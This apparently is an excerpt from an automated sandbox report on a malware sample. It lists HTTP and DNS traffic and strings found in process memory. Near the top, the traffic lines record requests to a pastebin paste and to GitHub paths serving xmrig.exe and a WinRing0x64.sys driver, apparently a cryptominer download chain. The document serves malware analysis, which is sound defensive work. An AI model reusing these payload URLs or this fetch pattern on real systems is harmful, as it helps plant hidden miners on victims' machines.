                  Source: global trafficHTTP traffic detected: GET /raw/PTNbBX9V HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /S1lentHash/xmrig/raw/main/xmrig.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: global trafficDNS traffic detected: DNS query: github.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 23:45:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: HITAge: 636Server: cloudflareCF-RAY: 8be1dad5ac6f7d1a-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 04 Sep 2024 23:45:44 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 04 Sep 2024 23:45:44 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                  Source: AppLaunch.exe, 0000000F.00000002.1791695388.0000000009D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                  Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1771702120.0000000004E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7LR
